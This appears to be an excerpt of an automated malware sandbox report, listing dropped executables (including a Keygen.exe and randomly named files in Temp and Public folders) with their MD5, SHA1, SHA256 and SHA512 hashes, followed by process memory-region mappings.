  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    7a6a1ab969a2c94d1f2d6e13f7742021

    SHA1

    18b7efe898785e9b971109c8bce656cc3fb14f4d

    SHA256

    4cf45bab031e9b844c171f19bd7b274666f91d6d56e6f0f831c95623ea53b05c

    SHA512

    22d96ee2e045c2f1b9df9fd1eaa04de678e91853d0544435a17196f17fd50435ff2d8fdbaf76c42ce6c75688324bc072a6d0f2ed05b7076302247521efdf8a85

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    7a6a1ab969a2c94d1f2d6e13f7742021

    SHA1

    18b7efe898785e9b971109c8bce656cc3fb14f4d

    SHA256

    4cf45bab031e9b844c171f19bd7b274666f91d6d56e6f0f831c95623ea53b05c

    SHA512

    22d96ee2e045c2f1b9df9fd1eaa04de678e91853d0544435a17196f17fd50435ff2d8fdbaf76c42ce6c75688324bc072a6d0f2ed05b7076302247521efdf8a85

  • C:\Users\Public\mus.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • C:\Users\Public\mus.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • C:\Users\Public\mus.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • C:\Users\Public\wht.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • C:\Users\Public\wht.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • C:\Users\Public\wht.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • \Users\Admin\AppData\Local\Temp\6ED9.tmp\Keygen.exe
    MD5

    ea2c982c12fbec5f145948b658da1691

    SHA1

    d17baf0b8f782934da0c686f2e87f019643be458

    SHA256

    eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

    SHA512

    1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • \Users\Public\mus.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • \Users\Public\mus.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • \Users\Public\wht.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • \Users\Public\wht.exe
    MD5

    92821d6dd83105f5f2d08c43f28fa309

    SHA1

    93c72e2494705509b56ca93cea2448aff098cb6d

    SHA256

    dc3171271adef72e1faf51d68c3c76daaffa9f097ef6d51aa600c98f129209e8

    SHA512

    47c3a27b5a9fa6273d779ed8afffeb2bbbecab6420708f0ca36629932e1d910e06297839ca39ec01fe7e975a52ed12aaa0e781f5112870e1b7621722e1808c08

  • memory/520-26-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/520-18-0x0000000000000000-mapping.dmp
  • memory/520-49-0x0000000004950000-0x0000000004951000-memory.dmp
    Filesize

    4KB

  • memory/520-55-0x00000000053D0000-0x00000000053D1000-memory.dmp
    Filesize

    4KB

  • memory/580-24-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/580-20-0x0000000000000000-mapping.dmp
  • memory/628-28-0x0000000000000000-mapping.dmp
  • memory/768-130-0x0000000006570000-0x0000000006571000-memory.dmp
    Filesize

    4KB

  • memory/768-118-0x00000000063B0000-0x00000000063B1000-memory.dmp
    Filesize

    4KB

  • memory/768-43-0x0000000004A30000-0x0000000004A31000-memory.dmp
    Filesize

    4KB

  • memory/768-205-0x0000000006670000-0x0000000006671000-memory.dmp
    Filesize

    4KB

  • memory/768-23-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/768-19-0x0000000000000000-mapping.dmp
  • memory/768-206-0x0000000006680000-0x0000000006681000-memory.dmp
    Filesize

    4KB

  • memory/768-127-0x0000000006450000-0x0000000006451000-memory.dmp
    Filesize

    4KB

  • memory/1028-5-0x0000000000000000-mapping.dmp
  • memory/1028-4-0x0000000000000000-mapping.dmp
  • memory/1056-0-0x0000000000000000-mapping.dmp
  • memory/1120-13-0x0000000000000000-mapping.dmp
  • memory/1368-11-0x0000000000000000-mapping.dmp
  • memory/1472-30-0x0000000000000000-mapping.dmp
  • memory/1516-37-0x00000000024F0000-0x00000000024F1000-memory.dmp
    Filesize

    4KB

  • memory/1516-93-0x0000000006530000-0x0000000006531000-memory.dmp
    Filesize

    4KB

  • memory/1516-35-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/1516-76-0x0000000006500000-0x0000000006501000-memory.dmp
    Filesize

    4KB

  • memory/1516-69-0x0000000006450000-0x0000000006451000-memory.dmp
    Filesize

    4KB

  • memory/1516-31-0x0000000000000000-mapping.dmp
  • memory/1516-68-0x00000000062B0000-0x00000000062B1000-memory.dmp
    Filesize

    4KB

  • memory/1516-63-0x0000000006260000-0x0000000006261000-memory.dmp
    Filesize

    4KB

  • memory/1768-10-0x0000000000000000-mapping.dmp
  • memory/1776-8-0x0000000000000000-mapping.dmp
  • memory/1816-15-0x0000000000000000-mapping.dmp
  • memory/1828-16-0x0000000000000000-mapping.dmp
  • memory/1832-36-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/1832-33-0x0000000000000000-mapping.dmp
  • memory/1988-17-0x0000000000000000-mapping.dmp
  • memory/1988-25-0x00000000707F0000-0x0000000070EDE000-memory.dmp
    Filesize

    6.9MB

  • memory/2500-113-0x0000000000000000-mapping.dmp
  • memory/2512-111-0x0000000000000000-mapping.dmp
  • memory/2572-203-0x000007FEF6690000-0x000007FEF690A000-memory.dmp
    Filesize

    2.5MB

  • memory/2680-136-0x0000000000000000-mapping.dmp
  • memory/2724-141-0x0000000000000000-mapping.dmp
  • memory/2744-144-0x0000000000000000-mapping.dmp
  • memory/2784-152-0x0000000000000000-mapping.dmp
  • memory/2844-166-0x0000000000400000-0x0000000000498000-memory.dmp
    Filesize

    608KB

  • memory/2844-169-0x0000000000400000-0x0000000000498000-memory.dmp
    Filesize

    608KB

  • memory/2844-167-0x000000000043FCC3-mapping.dmp
  • memory/2856-175-0x000000000043FCC3-mapping.dmp
  • memory/2964-192-0x000000000041A684-mapping.dmp
  • memory/2964-196-0x0000000000400000-0x0000000000425000-memory.dmp
    Filesize

    148KB

  • memory/2980-193-0x000000000041A684-mapping.dmp
  • memory/2980-188-0x0000000000400000-0x0000000000425000-memory.dmp
    Filesize

    148KB

  • memory/3000-200-0x0000000000400000-0x0000000000439000-memory.dmp
    Filesize

    228KB

  • memory/3000-194-0x0000000000417A8B-mapping.dmp
  • memory/3000-190-0x0000000000400000-0x0000000000439000-memory.dmp
    Filesize

    228KB